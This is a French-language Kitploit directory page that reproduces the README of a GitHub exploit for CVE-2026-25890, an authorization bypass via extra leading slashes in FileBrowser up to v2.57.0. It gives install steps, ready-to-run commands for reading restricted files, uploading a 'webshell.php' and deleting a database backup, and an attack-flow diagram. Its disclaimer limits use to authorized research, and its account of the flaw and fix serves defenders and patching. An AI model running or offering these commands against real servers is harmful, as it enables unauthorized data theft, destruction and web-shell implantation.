Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-25890-FileBrowser-Access-Control-Bypass — Exploit pour CVE-2026-25890, un contournement d'autorisation basé sur le chemin dans FileBrowser <= v2.57.0, permettant aux utilisateurs authentifiés à faibles privilèges de lire, téléverser et supprimer des fichiers restreints via plusieurs barres obliques en tête. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-25890-filebrowser-access-control-bypass
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubmbanyamer/cve-2026-25890-filebrowser-access-control-bypass

CVE-2026-25890-FileBrowser-Access-Control-Bypass

Exploit pour CVE-2026-25890, un contournement d'autorisation basé sur le chemin dans FileBrowser <= v2.57.0, permettant aux utilisateurs authentifiés à faibles privilèges de lire, téléverser et supprimer des fichiers restreints via plusieurs barres obliques en tête.

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-25890 - Contournement du contrôle d'accès FileBrowser

Author GitHub license Python version CVE Exploit-DB Tested on

Les utilisateurs non authentifiés ne peuvent pas exploiter cette faille — nécessite des identifiants valides à faibles privilèges restreints pour le chemin cible.

Contournement de l'autorisation basée sur le chemin dans FileBrowser ≤ v2.57.0 en utilisant plusieurs barres obliques de tête (//private au lieu de /private) pour échapper aux vérifications strings.HasPrefix() tandis que le système de fichiers sert toujours le chemin canonique.

Corrigé dans la v2.57.1 (commit 489af403... – suppression de r.SkipClean(true)).

📦 Fonctionnalités

  • Lecture de fichiers restreints
  • Téléversement de fichiers dans des répertoires restreints
  • Suppression de fichiers restreints
  • Nombre personnalisé de barres obliques de tête pour tester le contournement
  • Enregistrement local des fichiers divulgués
  • Aperçu détaillé du contenu
  • CLI propre avec argparse

🛠️ Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/banyamer/CVE-2026-25890-FileBrowser-Bypass.git
cd CVE-2026-25890-FileBrowser-Bypass

# Aucune dépendance au-delà de la bibliothèque standard + requests
pip install requests

🚀 Utilisation

root@kitploit:~
python3 exploit.py --help

Exemples de base

root@kitploit:~
# Lire un fichier restreint
python3 exploit.py \
  --url http://192.168.1.50:8080 \
  --username bob \
  --password password123 \
  --path /private/secret.txt \
  --action read \
  --save leaked_secret.txt \
  --verbose
root@kitploit:~
# Téléverser un fichier malveillant dans un dossier restreint
python3 exploit.py \
  --url http://target:8080 \
  --username lowpriv \
  --password pass \
  --path /data/ \
  --action upload \
  --upload-file webshell.php \
  --slashes 3
root@kitploit:~
# Supprimer un fichier restreint
python3 exploit.py \
  --url http://10.10.10.123:80 \
  --username alice \
  --password secret \
  --path /backups/database.bak \
  --action delete \
  --slashes 4

📊 Flux d'attaque PoC

root@kitploit:~
sequenceDiagram
    participant Attaquant
    participant FileBrowser ≤ v2.57.0
    participant Routeur Gorilla Mux
    participant Middleware d'authentification
    participant Gestionnaire du système de fichiers

    Attaquant->>FileBrowser: GET /api/resources/private/secret.txt<br>(requête normale)
    FileBrowser->>Gorilla Mux: Chemin = /api/resources/private/secret.txt
    Gorilla Mux->>Middleware d'authentification: chemin = "/private/secret.txt"
    Middleware d'authentification->>Middleware d'authentification: strings.HasPrefix("/private/secret.txt", interdit="/private") → true
    Middleware d'authentification->>Attaquant: 403 Interdit

    Note over Attaquant,FileBrowser: L'attaquant tente le contournement

    Attaquant->>FileBrowser: GET /api/resources//private/secret.txt
    FileBrowser->>Gorilla Mux: Chemin = /api/resources//private/secret.txt<br>(SkipClean=true → pas de normalisation)
    Gorilla Mux->>Middleware d'authentification: chemin = "//private/secret.txt"
    Middleware d'authentification->>Middleware d'authentification: HasPrefix("//private/secret.txt", "/private") → false
    Middleware d'authentification->>Gestionnaire du système de fichiers: Autorisé → continuer
    Gestionnaire du système de fichiers->>Système de fichiers: Normalise // → /private/secret.txt
    Système de fichiers->>Gestionnaire du système de fichiers: Renvoie le contenu du fichier
    Gestionnaire du système de fichiers->>Attaquant: 200 OK + contenu secret

⚠️ Avertissement légal et éthique

Cette preuve de concept est fournie strictement à des fins éducatives et de recherche en sécurité.
N'utilisez pas ce code contre un système sans autorisation écrite explicite du propriétaire.
L'accès ou la modification non autorisés de systèmes est illégal dans la plupart des juridictions (par exemple CFAA, Computer Misuse Act).

📜 Références

  • Avis GitHub GHSA-4mh3-h929-w968
  • Commit de correction
  • Version v2.57.1

❤️ Crédits

Auteur de l'exploit : Mohammed Idrees Banyamer
Pays : Jordanie
Instagram : @banyamer_security

Mettez une étoile ⭐ au dépôt si vous le trouvez utile !


Dernière mise à jour : février 2026

Télécharger l’outil